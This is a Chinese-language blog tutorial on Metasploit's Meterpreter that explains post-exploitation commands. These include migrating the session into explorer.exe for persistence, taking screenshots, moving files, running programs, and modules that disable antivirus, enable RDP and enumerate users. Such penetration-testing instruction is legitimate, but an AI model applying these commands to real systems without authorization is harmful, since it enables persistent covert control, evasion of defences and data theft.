欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

MSF:Meterpreter简介、基本命令

程序员文章站 2022-03-24 08:37:22
...

内容

  • Meterpreter简介
  • Meterpreter优点
  • Meterpreter基本命令

Meterpreter简介

  • Meterpreter是MSF中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道
  • Meterpreter是MSF的一个扩展模块,可以调用MSF的一些功能,对目标系统进行更为深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希值获取、特权提升、跳板攻击等等

Meterpreter优点

  • 纯内存工作模式,不需要对磁盘进行任何写入操作
  • 使用加密通信协议,而且可以同时与几个信道通信
  • 在被攻击进程内工作,不需要创建新的进程
  • 易于在多进程之间迁移
  • 平台通用,适用于Windows、Linux、BSD系统,并支持Inter x86和Inter x64平台

Meterpreter基本命令

在获得系统的Meterpreter会话之后,可以利用一些基本的Meterpreter命令,来收集更多的信息。可以输入help命令查看使用,这里我们列举一部分

MSF:Meterpreter简介、基本命令

1、进程迁移

在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。

输入ps命令获取目标机正在运行的进程

MSF:Meterpreter简介、基本命令

 

输入getpid命令查看Meterpreter Shell的进程号

MSF:Meterpreter简介、基本命令

输入migrate 3224命令(3224是当前Explorer.exe进程的PID)把Shell移动到PID为3224的Explorer.exe进程里,因为该进程是一个稳定的应用。只要Explorer.exe进程一直运行,当前的meterpreter会话就不会中断。常常利用此命令将meterpreter移植到一些一直不会关闭的进程中,可以最大程度的保证meterpreter的寿命。

MSF:Meterpreter简介、基本命令

完成进程迁移后,再次输入getpid命令查看Meterpreter Shell的进程号,发现PID已经变成了3224,说明已经成功迁移到Explorer.exe进程里。

进程迁移完成后,原先PID为1172的进程会自动关闭,如果没有自动关闭可以输入kill 1172命令来结束该进程。

使用自动迁移进程命令,系统会自动寻找合适的进程然后迁移

//Meterpreter Shell
run post/windows/manage/migrate                //自动迁移进程命令

2、系统命令

获得了稳定的进程后,接下来收集系统信息

sysinfo:这个命令可以获取系统运行的平台

MSF:Meterpreter简介、基本命令

screenshot:截屏

MSF:Meterpreter简介、基本命令

 

background:将当前的session放到后台运行,可以在msf中继续其他的渗透任务。此命令适合在多个Meterpreter会话的场景下使用

MSF:Meterpreter简介、基本命令

sessions

  • 这个命令需要配合上面的background来使用
  • sessions:查看已经成功获取的会话
  • sessions -i ID:连接到执行ID的meterpreter会话已继续利用

MSF:Meterpreter简介、基本命令

getuid:获取运行Meterpreter会话的用户名

MSF:Meterpreter简介、基本命令

upload:upload 源文件路径 目的文件路径

MSF:Meterpreter简介、基本命令

download :download  目标文件路径  本地路径

MSF:Meterpreter简介、基本命令

execute:在目标机中执行文件

MSF:Meterpreter简介、基本命令

 

查看目标机是否运行在虚拟机上

run post/windows/gather/checkvm

MSF:Meterpreter简介、基本命令

idletime命令查看运行时间

MSF:Meterpreter简介、基本命令

输入route命令查看目标机完整的网络设置

MSF:Meterpreter简介、基本命令

run post/windows/manage/killav               //关闭目标机系统杀软
run post/windows/manage/enable_rdp           //启动目标机的远程桌面协议
run post/windows/manage/autoroute            //查看目标机的本地子网情况
run post/windows/gather/enum_logged_on_users //列举有多少用户登录了目标机
run post/windows/gather/enum_applications    //列举安装在目标机上的应用程序

输入shell命令进入目标机Shell下面

MSF:Meterpreter简介、基本命令

输入exit命令可以停止Shell会话并返回Meterpreter。最后输入exit命令停止Meterpreter会话。

文件系统命令

pwd                           查看当前处于目标机的哪个目录
getwd                         查看当前处于目标机的哪个目录
getlwd                        查看当前处于本地的哪个目录
ls                            列出当前目录中的所有文件
cd                            切换目录

search命令:搜索执行类型的文件

  • -f参数:用于指定搜索文件模式
  • -d参数:用于指定在哪个目录下进行搜索

MSF:Meterpreter简介、基本命令

 

相关标签: Metasploit